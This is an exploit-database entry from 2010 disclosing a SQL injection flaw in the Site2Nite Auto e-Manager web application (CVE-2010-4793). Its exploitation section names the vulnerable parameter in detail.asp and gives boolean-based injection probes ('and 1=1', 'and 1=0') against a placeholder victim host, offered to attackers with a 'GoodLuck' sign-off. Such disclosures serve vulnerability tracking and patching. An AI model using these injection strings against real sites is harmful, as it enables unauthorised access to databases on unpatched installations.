Site2Nite Auto e-Manager - SQL Injection



EKU-ID: 21492 CVE: OSVDB-68605;CVE-2010-4793 OSVDB-ID:
Author: KnocKout Published: 2010-10-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation~~~~~~~~~~~

   http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
   http://VICTIM/www/detail.asp?ID=654 and 1=1  {True}
   http://VICTIM/www/detail.asp?ID=654 and 1=0  {False}

    ================================

     GoodLuck.